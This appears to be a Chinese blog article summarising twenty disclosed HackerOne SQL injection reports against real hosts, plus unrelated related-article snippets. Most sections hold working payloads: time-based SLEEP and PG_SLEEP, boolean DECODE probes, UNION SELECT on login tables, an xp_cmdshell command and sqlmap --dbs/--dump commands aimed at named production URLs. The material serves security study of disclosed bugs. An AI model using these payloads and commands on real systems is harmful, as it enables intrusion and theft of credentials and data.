当前位置: 首页 > article >正文

SQLI漏洞公开报告分析

文章目录

      • 1. 闭合 ')
      • 2. 邀请码|POST参数|时间盲注 | **PostgreSQL**
      • 3. POST|order by参数|布尔盲注|Oracle
      • 4. SOAP请求|MSSQL|布尔盲注
      • 5. MySQL 时间盲注漏洞
      • 6. GET|普通回显注入
      • 7. ImpressCMS 1.4.2 | CVE | POST | 布尔盲注
      • 8. Mysql | post | 布尔/时间盲注
      • 9. 登录口 | post | mysql | 时间盲注
      • 10. SQL Server | CVE | GET | 时间盲注
      • 11. 登录口 | POST | Mysql | 时间盲注
      • 12. 登录口 | POST | Mysql | 时间盲注
      • 13. SQL Server | GET | 布尔盲注
      • 14. Mysql | GET | 时间盲注
      • 15. GET | Mysql | 布尔/时间盲注
        • 漏洞入口:
        • 自动化验证:
        • 注入类型与 Payload:
        • 数据库信息泄露:
      • 16. COOKIE注入 | 普通回显型
        • 漏洞验证请求示例:
      • 17. GET | 报错注入 | SQL Server
        • **漏洞验证与攻击路径**:
      • 18. Mysql | GET | 时间盲注
        • 漏洞描述:
        • 漏洞验证请求(PoC):
      • 19. POST | 时间盲注
        • 复现步骤:
        • Payload 有效示例(Sleep 3 秒):
        • 对照请求(Sleep 0 秒):
        • 复现结果:
      • 20. Serendipity CMS | GET | 时间盲注
        • 复现步骤:

1. 闭合 ')

MTN Group | Report #2958619 - SQLi | in URL paths | HackerOne

触发错误验证漏洞存在

  • 假设原始URL中的 customerId 参数被用于如下查询:

    SELECT * FROM customers WHERE (id = '<输入的customerId>')
    
  • 攻击者提交 customerId=123'(末尾添加单引号),导致查询变为:

    SELECT * FROM customers WHERE (id = '123'')  -- 语法错误:引号未闭合
    
  • 数据库返回错误(如Unclosed quotation mark),证明输入未经过滤,漏洞存在。

2. 邀请码|POST参数|时间盲注 | PostgreSQL

Mozilla | Report #2209130 - SQL Injection on prod.oidc-proxy.prod.webservices.mozgcp.net via invite_code parameter - Mozilla social inscription | HackerOne

  1. 触发异常行为

    • 请求示例

      POST /interaction/KTTbkN8LaJgYIb7fIwPYX/signup HTTP/2
      Host: prod.oidc-proxy.prod.webservices.mozgcp.net
      ...
      invite_code=xxx'  -- 添加单引号
      
    • 响应结果:服务器返回 500 错误(内部错误)。

    • 二次测试:将单引号闭合为 invite_code=xxx'',服务器返回 200 成功

    • 关键结论:输入未正确过滤,存在 SQL 注入风险。

  2. 时间盲注验证

    • Payload 构造:通过 PG_SLEEP 函数触发数据库延迟响应。

      invite_code=xxx');(SELECT 4564 FROM PG_SLEEP(5))--
      
    • 执行效果

      • 数据库执行 PG_SLEEP(5),导致服务器响应延迟 5 秒
      • 同理,注入 PG_SLEEP(10)PG_SLEEP(20) 时,响应分别延迟 10 秒20 秒
    • 技术原理

      • ');:闭合原查询的括号和引号,终止合法语句。
      • (SELECT ... FROM PG_SLEEP(N)):注入自定义 SQL,强制数据库休眠 N 秒。
      • --:注释符,忽略后续字符,避免语法错误。
  3. 自动化攻击可能性

    • 使用工具如 sqlmap 可自动化利用此漏洞:

      sqlmap -u "https://prod.oidc-proxy.prod.webservices.mozgcp.net/interaction/..." --data="invite_code=xxx*" --dbms=postgresql --level=5
      
    • 潜在风险

      • 提取数据库版本、表名、字段内容(如用户凭证)。
      • 执行系统命令(需数据库权限配置不当)。

3. POST|order by参数|布尔盲注|Oracle

U.S. Dept Of Defense | Report #2081316 - Blind Sql Injection in https://█████/qsSearch.aspx | HackerOne

  1. 基础验证

    • 原始请求

      POST /qsSearch.aspx HTTP/1.1
      Host: ████████
      ...
      HiddenFieldSortOrder=seqno  -- 原始参数
      
    • 正常响应:页面返回预期数据。

  2. 基于错误的条件盲注

    • Payload 1 - 探测用户名长度

      HiddenFieldSortOrder=seqno-DECODE(length(user),5,1,1/0)
      
      • 攻击逻辑
        • user 字段长度为 5,执行 1(正常返回)。
        • 否则,触发 1/0(除零错误,页面异常)。
      • 观察结果
        • 当输入长度为5时,页面返回正常数据(确认用户名为5字符)。
    • Payload 2 - 逐字符爆破用户名

      HiddenFieldSortOrder=seqno-DECODE(lpad(user,5),'QSWEB',1,1/0)
      
      • 攻击逻辑
        • lpad(user,5):将 user 左填充至5字符(假设原始用户名为5字符)。
        • 若填充后等于 'QSWEB',执行 1(正常返回)。
        • 否则,触发 1/0(页面异常)。
      • 观察结果
        • 输入 'QSWEB' 时页面正常,确认用户名为 QSWEB
        • 输入错误值(如 'QSWE1')时页面异常。
  3. 自动化攻击

    • 使用 Burp Intruder 暴力枚举用户名:

      • 模板配置

        HiddenFieldSortOrder=seqno-DECODE(lpad(user,5),'§a§',1,1/0)
        
        • §a§ 设为爆破点,遍历5字符组合。
      • 判断依据

        • 响应长度或状态码差异(正常用户名为200 OK,错误触发500)。

4. SOAP请求|MSSQL|布尔盲注

U.S. Dept Of Defense | Report #2072306 - Blind Sql Injection in https://████████/ | HackerOne

  1. 基础请求分析

    • 原始 SOAP 请求

      <GetAllFacilitiesForNewUserRegistration><searchValue>*</searchValue>  <!-- 正常通配符查询 -->
      </GetAllFacilitiesForNewUserRegistration>
      

      运行 HTML

    • 正常响应:返回所有匹配的设施列表(HTTP 200)。

  2. 布尔盲注验证

    • Payload 构造

      <searchValue>1' AND substring(system_user,1,16)='public\dsfwsuser' AND '%'='</searchValue>
      

      运行 HTML

    • 攻击逻辑

      • system_user 前16字符为 public\dsfwsuser,条件成立,返回正常数据。
      • 否则,查询无结果或返回异常(通过响应内容长度或状态码差异判断)。
    • 观察结果

      • 当用户名为 public\dsfwsuser 时,页面返回预期数据。
      • 输入错误值(如 'unknownuser')时,响应内容为空或异常。
  3. 自动化工具利用

    • 使用 sqlmap 自动化注入(需携带有效会话 Cookie):

      sqlmap -r 11.txt --random-agent --batch --technique=B --dbms=mssql --force-ssl
      
    • 关键参数

      • --technique=B:指定布尔盲注技术。
      • --dbms=mssql:声明目标数据库类型。
    • 已确认信息

      • 数据库名称:dsfdb
      • 数据库用户:public\dsfwsuser

5. MySQL 时间盲注漏洞

U.S. Dept Of Defense | Report #2020429 - Blind Sql Injection https:/████████ | HackerOne

  1. 时间盲注验证

    • Payload 构造

      0' XOR (IF(now()=sysdate(), SLEEP(15), 0) XOR 'Z
      
    • 攻击逻辑

      • now()sysdate() 在 MySQL 中功能相同,条件恒为真。
      • 触发 SLEEP(15) 强制数据库休眠 15 秒。
      • 通过响应时间判断注入是否成功。
    • 测试结果

      Payload响应延迟
      0'XOR(IF(1=1,SLEEP(15),0)XOR'Z15.896秒
      0'XOR(IF(1=1,SLEEP(10),0)XOR'Z10.740秒
      0'XOR(IF(1=1,SLEEP(2),0)XOR'Z2.714秒
      0'XOR(IF(1=1,SLEEP(1),0)XOR'Z1.927秒
    • 结论:响应时间与 SLEEP 参数高度吻合,确认漏洞存在。

  2. 自动化工具利用

    • 使用 sqlmap 进行自动化利用:

      sqlmap -u "https://██████/0*" --technique=T --dbms=mysql --time-sec=15
      
    • 参数说明

      • --technique=T:指定时间盲注技术。
      • --time-sec=15:设置基准延迟时间。

6. GET|普通回显注入

[U.S. Dept Of Defense | Report #1628408 - SQL Injection at https://████████.asp (█████████) selMajcom] [HtUS] | HackerOne

  1. 基础验证

    • 原始请求

      GET /█████mil/AFServices/RequestAccess.asp?selMajcom=MAT*&selbase=MXRD&Submitted=1 HTTP/1.1
      Host: ██████████.████.net
      
    • 正常响应:返回与 MAT* 匹配的军事单位列表(HTTP 200)。

  2. 自动化注入验证

    • 保存请求文件:将包含 Cookie 和参数的请求保存为 dod.txt

    • 使用 sqlmap 攻击

      sqlmap -r dod.txt --dbs --level 3 --risk 3 -v3
      
    • 攻击结果

      available databases [24]:
      [*] ActivityManager         -- 活动管理数据库
      [*] AFServicesUsers         -- 空军服务用户凭证库
      [*] BaseProjects            -- 军事基地项目数据
      [*] W2DATA                  -- 工资及税务记录
      [*] ██████████              -- 敏感军事资产数据库(名称脱敏)
      ...
      
  3. 手动注入验证

    • Payload 构造

      GET /RequestAccess.asp?selMajcom=MAT' UNION SELECT user,name FROM sys.sql_logins-- 
      
    • 攻击逻辑

      • 闭合原查询参数 MAT*,注入 UNION SELECT 联合查询。
      • 提取 SQL 登录账户信息(用户名为 sa 等高权限账户风险极高)。

7. ImpressCMS 1.4.2 | CVE | POST | 布尔盲注

ImpressCMS | Report #1081145 - SQL Injection through /include/findusers.php | HackerOne

  1. 漏洞定位

    • 问题代码

      // /include/findusers.php (行 281 和 294)
      $total = $user_handler->getUserCountByGroupLink(@$_POST["groups"], $criteria);
      $foundusers = $user_handler->getUsersByGroupLink(@$_POST["groups"], $criteria, TRUE);// icms_member_Handler 类方法 (行 469-471)
      if (!empty($groups)) {$sql[] = "m.groupid IN (" . implode(", ", $groups) . ")";
      }
      
    • 关键缺陷

      • $_POST["groups"] 直接拼接至 SQL 查询,未进行整数类型验证或参数化处理。
  2. 攻击原理

    • Payload 构造示例

      POST /include/findusers.php HTTP/1.1
      ...
      groups[]=1) OR (SELECT SUBSTR(password,1,1) FROM users WHERE uid=1)='a' --
      
    • 解析后的 SQL

      SELECT DISTINCT u.* FROM icms_users AS u 
      LEFT JOIN icms_groups_users_link AS m ON m.uid = u.uid 
      WHERE 1 = '1' AND m.groupid IN (1) OR (SELECT SUBSTR(password,1,1) FROM users WHERE uid=1)='a' -- )
      
    • 攻击效果

      • 若管理员密码哈希首字符为 a,查询返回用户列表;否则返回空。通过布尔响应差异推断数据。
  3. 未授权利用条件

    • 依赖漏洞:#1081137(如 CSRF 令牌绕过或会话固定),允许攻击者未认证调用 findusers.php

8. Mysql | post | 布尔/时间盲注

[U.S. Dept Of Defense | Report #1627995 - SQL injection at https://█████████] [HtUS] | HackerOne

  1. 漏洞定位

    • 攻击目标staff_student 参数(POST 请求)

    • 请求示例

      http

      复制

      POST /olc/███comments/comment_post.php HTTP/1.1
      ...
      staff_student=STUDENT&scn=xxx&comments=xx&Submit=Submit+Comments
      
  2. 自动化验证(sqlmap)

    • 命令执行

      bash

      复制

      sqlmap -u "https://███████" --data="staff_student=STUDENT&scn=xxx..." -p staff_student --dbms=mysql --dbs
      
    • 关键结果

      plaintext

      复制

      available databases [13]:
      [*] █████████       -- 核心业务数据库(名称脱敏)
      [*] ██████mobile    -- 移动端用户数据
      [*] LEAM            -- 教育培训管理系统
      [*] mysql           -- MySQL 系统表(含账户信息)
      [*] testusers       -- 测试用户凭证库
      ...
      
  3. 手动验证(布尔盲注示例)

    • Payload 构造

      http

      复制

      staff_student=STUDENT' AND (SELECT SUBSTR(database(),1,1)='a')-- 
      
    • 响应差异

      • 若当前数据库首字符为 a,页面返回正常内容。
      • 否则返回错误或空数据。

9. 登录口 | post | mysql | 时间盲注

[U.S. Dept Of Defense | Report #1627970 - time based SQL injection at https://███] [HtUS] | HackerOne

  1. 时间盲注手动验证

    • 恶意 Payload

      POST /olc/setlogin.php HTTP/1.1
      ...
      username=█████████'+(SELECT*FROM(SELECT(SLEEP(5)))a)+'&password=██████
      
    • 关键特征

      • 响应时间固定延迟 5 秒(与 SLEEP 参数严格匹配)
      • HTTP 状态码 302 重定向(需忽略跳转以观测注入效果)
  2. 自动化验证(sqlmap)

    • 命令执行

      sqlmap -u "https://www.████████" --data="username=test&password=123" -p username --dbms=mysql --dbs
      
    • 关键结果

      available databases [13]:
      [*] ███            -- 核心业务库(脱敏)
      [*] ██████mobile   -- 移动端用户数据
      [*] LEAM           -- 教育培训系统
      [*] mysql          -- 系统账户库(含 root 哈希)
      [*] testusers      -- 测试账户库
      ...
      

10. SQL Server | CVE | GET | 时间盲注

Tennessee Valley Authority | Report #1125752 - SQL Injection on https://soa-accp.glbx.tva.gov/ via “/api/” path - VI-21-015 | HackerOne

  1. 信息泄露验证

    • 获取主机名

      GET /api/river/observed-data/GVDA1'/*!50000union*/SELECT+HOST_NAME()--+- HTTP/1.1
      Host: soa-accp.glbx.tva.gov
      

      响应结果:返回数据库服务器主机名(如 SQLSVR-PROD-01)。

    • 提取数据库版本

      GET /api/river/observed-data/GVDA1'/*!50000union*/SELECT+@@version--+- HTTP/1.1
      

      响应结果

      Microsoft SQL Server 2017 (RTM-CU22-GDR) 14.0.3370.1 (X64)  
      Windows Server 2012 R2 Standard 6.3 (Build 9600)
      
  2. 时间盲注验证

    • 触发 10 秒延迟

      time curl -k "https://soa-accp.glbx.tva.gov/api/river/observed-data/-GVDA1'WAITFOR DELAY'0:0:10'--+-"
      

      关键特征:响应时间固定延迟 10 秒,确认漏洞存在。

11. 登录口 | POST | Mysql | 时间盲注

Acronis | Report #1224660 - bypass sql injection #1109311 | HackerOne

  1. 手动验证(时间盲注)

    • Payload 构造

      POST /wp-login.php HTTP/2
      Host: www.acronis.cz
      ...
      log=0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z&pwd=...
      
    • 关键特征

      • sleep(10) 注入时,响应时间固定延迟 12 秒(与网络波动无关)。
      • 其他 sleep 参数(如 sleep(3))同样呈现严格时间关联性(见 PoC 截图 {F1335267})。
  2. 自动化验证(sqlmap)

    • 命令示例

      sqlmap -u "https://www.acronis.cz/wp-login.php" --data="log=test&pwd=123" -p log --dbms=mysql --technique=T
      
    • 预期结果

      Type: time-based blind
      Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
      Payload: log=test' AND (SELECT 1234 FROM (SELECT(SLEEP(10)))qQlQ) AND 'a'='a&pwd=123
      

12. 登录口 | POST | Mysql | 时间盲注

MTN Group | Report #1069531 - Blind SQL Injection | HackerOne

  1. 手动验证(时间盲注)

    • Payload 构造

      POST /signin/ HTTP/1.1
      Host: futexpert.mtngbissau.com
      ...
      phone_number=0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z&pin=1&submit=Continuar
      
    • 关键特征

      • sleep(12) 注入时,响应时间固定延迟 12 秒以上(网络延迟误差范围内)。
      • now()sysdate() 在 MySQL 中功能相同,条件恒为真,确保攻击稳定性。
  2. 自动化利用(sqlmap)

    • 命令示例

      sqlmap -u "https://futexpert.mtngbissau.com/signin/" \
      --data="phone_number=0&pin=1&submit=Continuar" \
      -p phone_number --dbms=mysql --technique=T --time-sec=12
      
    • 预期结果

      Type: time-based blind
      Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
      Payload: phone_number=0' AND (SELECT 9274 FROM (SELECT(SLEEP(12)))zHqJ) AND 'a'='a&pin=1&submit=Continuar
      

13. SQL Server | GET | 布尔盲注

U.S. Dept Of Defense | Report #1250293 - SQL injection my method -1 OR 321=6 AND 000159=000159 | HackerOne

  1. 布尔逻辑测试

    • Payload 构造

      sDirID=-1 OR 3*2*1=6 AND 000159=000159
      
    • 关键特征

      • 当布尔条件为真(如 3*2=6)时,页面返回正常业务数据(原始值 51)。
      • 当条件为假(如 3*2=5)时,返回空数据或异常状态码。
    • 攻击扩展

      sDirID=-1 OR (SELECT TOP 1 SUBSTRING(username,1,1) FROM users)='a'
      
      • 若管理员用户名首字母为 a,返回有效数据,否则异常。
  2. 自动化利用(sqlmap)

    • 命令示例

      sqlmap -r request.txt --batch --dbms=mssql --technique=B --dump -T users
      
    • 预期结果

      Database: ██████
      Table: users
      [1 entry]
      +----+----------+------------------+
      | id | username | password_hash    |
      +----+----------+------------------+
      | 1  | admin    | 5f4dcc3b5aa765...|
      +----+----------+------------------+
      

14. Mysql | GET | 时间盲注

Uber | Report #476150 - SQLI on desafio5estrelas.com | HackerOne

15. GET | Mysql | 布尔/时间盲注

Automattic | Report #1069561 - SQL Injection intensedebate.com | HackerOne

漏洞入口:
  • 参数位置GET 参数
  • 可疑参数acctid
自动化验证:

使用 sqlmap 工具进行自动化检测与验证,命令如下:

sqlmap --url https://www.intensedebate.com/js/importStatus.php?acctid=1 --dbs
注入类型与 Payload:
  • 布尔盲注

    acctid=1 AND 1726=1726
    

    当注入条件为真时页面响应正常,条件为假时响应异常,证明存在 SQL 注入。

  • 时间盲注

    sql复制编辑
    acctid=1 AND (SELECT 8327 FROM (SELECT(SLEEP(5)))yrDl)
    

    页面响应延迟约 5 秒,进一步确认数据库执行了 sleep 函数,证明为可控 SQL 执行环境。

数据库信息泄露:

sqlmap 自动获取到以下数据库:

plaintext复制编辑[*] heartbeat
[*] id_comments
[*] information_schema

此信息表明攻击者可枚举系统中全部数据库结构并进行进一步攻击。

16. COOKIE注入 | 普通回显型

MTN Group | Report #761304 - SQL Injection on cookie parameter | HackerOne

漏洞验证请求示例:
http复制编辑GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1
Host: mtn.com.ye
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=86ce3d04baa357ffcacf5d013679b696; lang=en'; _ga=GA1.3.1859249834.1576704214; _gid=GA1.3.1031541111.1576704214; _gat=1; _gat_UA-44336198-10=1
Upgrade-Insecure-Requests: 1

验证行为:

  • 注入 '(单引号)后,页面返回 SQL 错误,显示语法异常。
  • 注入 ''(闭合引号)后,页面恢复正常响应。

说明服务端在处理 Cookie 中的 lang 参数时,存在 SQL 拼接风险。

目前仅做了探测性测试,未尝试进一步数据读取或利用,请求许可后可进行下一步漏洞确认。

17. GET | 报错注入 | SQL Server

U.S. Dept Of Defense | Report #227102 - Two Error-Based SQLi in courses.aspx on ██████████ | HackerOne

漏洞验证与攻击路径:
  1. 触发错误泄露信息

    • Payload 1(换行符注入):

      GET /onlinecatalog/courses.aspx?crs_id=%0a HTTP/1.1
      

      响应结果

      Error converting data type varchar to numeric.  
      Source Error: Line 174 - rscrs.open(sqlcrs, connectionString)
      
    • Payload 2(无效数值注入):

      GET /onlinecatalog/courses.aspx?crs_id=0 HTTP/1.1
      

      响应结果

      Either BOF or EOF is True...  
      Source Error: Line 177 - crs = rscrs("crs_header").value
      
  2. 攻击扩展风险

    • 信息泄露:通过错误回显获取表结构,构建精准注入 Payload。

    • 联合查询注入:利用已知表名提取敏感数据:

      crs_id=1 UNION SELECT username, password FROM users--
      
    • 系统命令执行(需高权限配置):

      crs_id=1; EXEC xp_cmdshell 'whoami'--
      

18. Mysql | GET | 时间盲注

Rocket.Chat | Report #433792 - Blind SQL injection in third-party software, that allows to reveal user statistic from rocket.chat and possibly hack into the rocketchat.agilecrm.com | HackerOne

漏洞描述:

在访问 Rocket.Chat 静态主页 https://rocket.chat/ 时,页面加载了第三方统计服务:

https://stats2.agilecrm.com/addstats?...

通过对该 URL 的参数 fuzzing 测试,发现其中 new 参数存在 盲注(Blind SQL Injection)漏洞。攻击者可利用该漏洞注入 SQL 语句,实现数据延时判断、数据库结构探测,进一步导致敏感信息泄露甚至系统控制风险。

漏洞验证请求(PoC):
http复制编辑GET /addstats?callback=json949659033379064&guid=f0d3738c-44c0-60a6-44b6-56e14ca30872&sid=2172c2ca-15b6-49c8-052d-b7d817cd280b&url=https%3A%2F%2Frocket.chat%2F&agile=8pat9ou8gh0thqd8dlgctje3go&new=(select*from(select(sleep(5)))a)&ref=&domain=dorgam HTTP/1.1
Host: stats2.agilecrm.com
Connection: close

若后端存在注入漏洞,执行 SLEEP(5) 后响应将延迟约 5 秒,实际测试结果为 页面加载延时 5 秒,确认存在基于时间的盲注(Time-Based Blind SQL Injection)。

19. POST | 时间盲注

U.S. Dept Of Defense | Report #348047 - Code reversion allowing SQLI again in ███████ | HackerOne

复现步骤:

对以下接口提交 POST 请求,通过对 userid 参数注入 payload,可以观察到明显的响应延迟:

Payload 有效示例(Sleep 3 秒):
makefile复制编辑POST /elist/email_aba.php HTTP/1.1
Host: ████████
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=xxxx
...Body:
lname=S&userid=admin'+(select*from(select(sleep(3)))a)+'&pw=admin
对照请求(Sleep 0 秒):
makefile复制编辑POST /elist/email_aba.php HTTP/1.1
Host: ████████
...Body:
lname=S&userid=admin'+(select*from(select(sleep(0)))a)+'&pw=admin
复现结果:
  • sleep(3) 请求明显延迟响应;
  • sleep(0) 请求无延迟;
  • 可据此判断目标站点后端存在时间盲注型 SQL 注入。

20. Serendipity CMS | GET | 时间盲注

Hanno’s projects | Report #374027 - blind sql injection | HackerOne

复现步骤:
  1. 普通请求示例:

    https://betterscience.org/plugin/tag/peerj
    

    返回带有 peerj 标签的文章。

  2. 注入测试请求:
    替换 peerj 为 SQL 注入 payload,例如:

    https://betterscience.org/plugin/tag/if(now()=sysdate(),sleep(6),0)/*...*/
    
  3. 多次请求对比响应时间:

    Payload响应时间
    if(now()=sysdate(),sleep(3),0)3.2s
    if(now()=sysdate(),sleep(9),0)9.3s
    if(now()=sysdate(),sleep(0),0)0.2s

    明显存在时间差异,说明 SQL 被注入执行。

相关文章:

SQLI漏洞公开报告分析

文章目录 1. 闭合 )2. 邀请码|POST参数|时间盲注 | **PostgreSQL**3. POST|order by参数|布尔盲注|Oracle4. SOAP请求|MSSQL|布尔盲注5. MySQL 时间盲注漏洞6. GET|普通回显注入7. ImpressCMS 1.4.2 | CVE | POST | 布尔盲注8. Mysql | post | 布尔/时间盲注9. 登录口 | post |…...

SpringBoot项目部署之启动脚本

一、启动脚本方案 1. 基础启动方式 1.1 直接运行JAR java -jar your-app.jar --spring.profiles.activeprod优点&#xff1a;简单直接&#xff0c;适合快速测试缺点&#xff1a;终端关闭即终止进程 1.2 后台运行 nohup java -jar your-app.jar > app.log 2>&1 &…...

用Django和AJAX创建一个待办事项应用

用Django和AJAX创建一个待办事项应用 推荐超级课程: 本地离线DeepSeek AI方案部署实战教程【完全版】Docker快速入门到精通Kubernetes入门到大师通关课AWS云服务快速入门实战目录 用Django和AJAX创建一个待办事项应用让我们创建一个简单的 Django 项目,其中包含不同类型的 A…...

JavaScript:游戏开发的利器

在近年来的科技迅速发展中&#xff0c;JavaScript 已逐渐成为游戏开发领域中最受欢迎的编程语言之一。它的跨平台特性、广泛的社区支持、丰富的库和框架使得开发者能够快速、有效地创建各种类型的游戏。本文将深入探讨 JavaScript 在游戏开发中的优势。 一、跨平台支持 JavaSc…...

C语言今天开始了学习

好多年没有弄了&#xff0c;还是捡起来弄下吧 用的vscode 建议大家参考这个配置 c语言vscode配置 c语言这个语言简单&#xff0c;但是今天听到了一个消息说python 不知道怎么debug。人才真多啊...

Elasticsearch 系列专题 - 第五篇:集群与性能优化

随着数据量和访问量的增长,单节点 Elasticsearch 已无法满足需求。本篇将介绍集群架构、性能优化方法以及常见故障排查,帮助你应对生产环境中的挑战。 1. 集群架构 1.1 节点角色(Master、Data、Ingest 等) Elasticsearch 集群由多个节点组成,每个节点可扮演不同角色: M…...

鸿蒙NEXT开发Preferences工具类(ArkTs)

import { AppUtil } from ./AppUtil; import dataPreferences from ohos.data.preferences; export const DEFAULT_PREFERENCE_NAME: string "SP_HARMONY_UTILS_PREFERENCES"; // Preferences实例的名称。/*** Preferences工具类* author CSDN-鸿蒙布道师* since 20…...

电商素材革命:影刀RPA魔法指令3.0驱动批量去水印,实现秒级素材净化

本文 去除水印实操视频展示电商图片水印处理的困境​影刀 RPA 魔法指令 3.0 强势登场​利用魔法指令3.0两步实现去除水印操作关于影刀RPA 去除水印实操视频展示 我们这里选择了4张小红书里面比较帅气的图片&#xff0c;但凡用过小红书的都知道&#xff0c;小红书右下角是会有小…...

前端面试题(七):什么是vuex,请解释一下它在Vue中的作用

Vuex 是一个专门为 Vue.js 应用程序开发的状态管理库。它可以集中管理应用的所有状态&#xff0c;并保证状态以一种可预测的方式发生变化。简单来说&#xff0c;Vuex 用来管理 Vue 应用中的数据&#xff08;即状态&#xff09;&#xff0c;使得数据的传递和共享更加清晰和可靠&…...

笔记:头文件与静态库的使用及组织方式

笔记&#xff1a;头文件与静态库的使用及组织方式 1. 头文件的作用 接口声明&#xff1a;提供函数、类、变量等标识符的声明&#xff0c;供其他模块调用。编译依赖&#xff1a;编译器需要头文件来验证函数调用和类型匹配。避免重复定义&#xff1a;通过包含保护&#xff08;如…...

ubuntu,react的学习(1)

在此目录下&#xff0c;开启命令行 /home/kt/react 如下操作 tkt4028:~/react$ npm create vitelatest task-manager -- --template react Need to install the following packages: create-vite6.3.1 Ok to proceed? (y) y> npx > cva task-manager --template react…...

【QT】QTreeWidgetItem的checkState/setCheckState函数和isSelected/setSelected函数

目录 1、函数原型1.1 checkState/setCheckState1.2 isSelected/setSelected2、功能用途3、示例QTreeWidget的checkState/setCheckState函数和isSelected/setSelected这两组函数有着不同的用途,下面具体说明: 1、函数原型 1.1 checkState/setCheckState Qt::CheckState QTr…...

CompletableFuture 和 List<CompletableFuture> allOf() join() get() 使用经验

CompletableFuture<Map<Menu, Map<IntentDetail, Double>>> xxx CompletableFuture.supplyAsync(() -> {Map<Menu, Map<IntentDetail, Double>> scores new ConcurrentHashMap<>();// 存储结果scores.computeIfAbsent(menu, k -> n…...

CExercise_09_结构体和枚举_2VS的Debug模式查看它的内存布局,采用结构体数组的方式存储信息,调用函数打印结构体数组.

题目&#xff1a; 下面结构体类型的变量的内存布局是怎样的&#xff1f;请使用VS的Debug模式查看它的内存布局 typedef struct stundent_s {int number;char name[25];char gender;int chinese;int math;int english; } Student;// 结构体对象的声明和初始化 Student s1 { 1, …...

SSRF漏洞技术解析与实战防御指南

一、SSRF漏洞简介 服务端请求伪造&#xff08;Server-Side Request Forgery, SSRF&#xff09; 是一种攻击者通过操控服务端发起非预期网络请求的安全漏洞。攻击者利用目标服务器的权限&#xff0c;构造恶意请求访问内网资源、本地系统文件或第三方服务&#xff0c;可能导致…...

CVA6:支持 Linux 的 RISC-V CPU CORE-V

RISC-V 是一种开源的可扩展指令集架构 (ISA)&#xff0c;在过去几年中广受欢迎。RISC-V 的主要特性之一是它采用整体架构中性设计&#xff0c;支持浮点运算、加载存储架构、符号扩展加速和多路复用器简化。这使得 RISC-V 成为 FPGA 上软处理器的经济实惠的选择。自 RISC-V ISA …...

水文-用 Coze 工作流打造你的自媒体写作工厂

零代码水文神器&#xff1a;用 Coze 工作流打造你的自媒体写作工厂 作为一个每天被 KPI 追着跑的自媒体运营人&#xff0c;你是不是也常常在想&#xff1a; “这篇文章换个标题就能发第二遍&#xff0c;能不能自动来&#xff1f;” 现在&#xff0c;用 Coze 工作流&#xff0c…...

轻奢宅家|约克VRF带你畅享舒适居家体验

下班回到家最期待什么&#xff1f;当然是一阵阵沁人心脾的舒适感扑面而来啦&#xff01;      想要从头到脚都舒服自在&#xff1f;答案就在眼前——就是它&#xff01;约克VRF中央空调&#xff01;      约克VRF中央空调独特的臻静降噪技术&#xff0c;让空调运行音轻…...

uniapp微信小程序图片生成水印

整体思路&#xff1a; 用户通过uni.chooseImage选择图片后&#xff0c;获得图片文件的path和size。通过path调用uni.getImageInfo获取图片信息&#xff0c;也就是图片宽高。图片宽高等比缩放至指定大小&#xff0c;不然手机处理起来非常久&#xff0c;因为手机随便拍拍就很大。…...

不用额外下载jar包,idea快速查看使用的组件源码

以nacos为例子&#xff0c;在idea中引入了nacos依赖&#xff0c;就可以查看源码了。 2. idea选择open&#xff08;不关闭项目直接选择file-open也可以&#xff09;, 在maven的仓库里找到对应的包&#xff0c;打开 2.idea中选择 jar包&#xff0c;选择 add as library 3.这样j…...

网络层-IP地址计算

例1&#xff1a;IP地址二进制与十进制互转 题目&#xff1a; 将二进制IP 11000000.10101000.00000001.00001010 转换为点分十进制。将IP地址 172.16.254.1 转换为二进制格式。 答案与解析&#xff1a; 转换步骤&#xff1a; 每个8位二进制转为十进制&#xff1a; 11000000 →…...

网络通讯协议UDP转发TCP工具_UdpToTcpRelay_双向版

UDP/TCP网络转发器程序说明书 1. 程序概述 本程序是一个高性能网络数据转发工具&#xff0c;支持UDP和TCP协议之间的双向数据转发&#xff0c;并具备以下核心功能&#xff1a; 协议转换&#xff1a;实现UDP↔TCP协议转换数据转换&#xff1a;支持十六进制/ASCII格式的数据转…...

DIA——边缘检测

1.边缘 边缘是像素的突变位置。 2.常见边缘检测算法 通过找到一阶导数的极值点或者二阶导数的过零点来确定边缘像素的位置。边缘检测通常使用算子&#xff0c;即特定的卷积核。通过差分对离散的像素点求导&#xff0c;然后转化成卷积核进行卷积。使用卷积统一涵盖求导&…...

【万象论坛】论坛系统测试报告

一、项目背景 1.1项目起因 在当今数字化浪潮下&#xff0c;互联网技术呈爆发式发展&#xff0c;新技术、新框架、新应用场景不断涌现。从大型企业的数字化转型到初创公司的技术创新&#xff0c;各个层面都离不开互联网技术的支撑。然而&#xff0c;技术人员在学习与工作过程中…...

【AI工具】FastGPT:开启高效智能问答新征程

前言 在人工智能飞速发展的当下&#xff0c;各类 AI 工具如雨后春笋般涌现。FastGPT 作为一款基于大语言模型&#xff08;LLM&#xff09;的知识图谱问答系统&#xff0c;凭借其强大的数据处理和模型调校能力&#xff0c;为用户带来了便捷的使用体验。今天&#xff0c;就让我们…...

华为数字芯片机考2025合集1已校正

单选 1&#xff0e;以下低功耗措施中&#xff0c;哪种不是降低电路翻转率的方法? A.在不进行算术运算的时候&#xff0c;使这些模块的输入保持不变&#xff0c;不让新的操作数进来 B.采用Gray 码或One‐hot 码作为状态机编码 C.减少电路中的glitch D.重新安排“if‐else”表达…...

【TS学习】(23)理解类的双重角色

在 TypeScript 中&#xff0c;类&#xff08;class&#xff09;不仅是一个运行时的值&#xff08;即可以实例化对象的构造函数&#xff09;&#xff0c;同时也是一个类型声明。具体来说&#xff0c;类在 TypeScript 中既声明了值&#xff0c;也声明了类型&#xff0c;并且它的类…...

多模态大模型在目标检测领域的最新进展

